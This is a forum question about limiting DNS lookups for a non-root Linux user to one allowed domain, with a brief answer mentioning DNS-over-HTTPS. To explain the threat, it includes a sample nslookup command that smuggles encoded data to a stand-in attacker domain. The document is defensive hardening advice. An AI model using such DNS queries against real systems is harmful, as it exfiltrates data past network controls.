Limit DNS resolution for user on Linux, DNS whitelist on per-user base
I run an application using a dedicated (non-root) user, e.g. myappuser, on a Linux server.
Can I limit the DNS resolution for this user to only a certain domain (whitelist for DNS resolution on per-user base)?
I want to allow lookups of some-api.example.org only.
But not evilguy.xyz.example.org, next-upcoming-log4j-vulnerability.ldap.example.org or anything else. Such lookups should simply FAIL.
Unfortunately I cannot tinker with name lookup inside of the application.
Is there maybe a way using systemd service unit settings? I really appreciate things like ReadWritePaths.
I already limit traffic by iptables and -m owner but DNS lookups using my normal DNS server IP address (operated by provider) are not restricted.
So you could actually transmit some payload using DNS requests, e.g. nslookup bad0a0ee6fbc73….attacker.example.org, to an arbitrary IP address as the DNS server would forward this request.
One idea I can think of is like this:

Disable DNS for myappuser entirely using iptables rule and -m owner for UDP/TCP port 53.
Use a cronjob to generate/update a static /etc/hosts entry for the only allowed API endpoint sub domain.

Is there a better solution?

Your own idea is the only solution that I can think of too. You should, however, be aware of DoH (DNS-over-HTTPS).
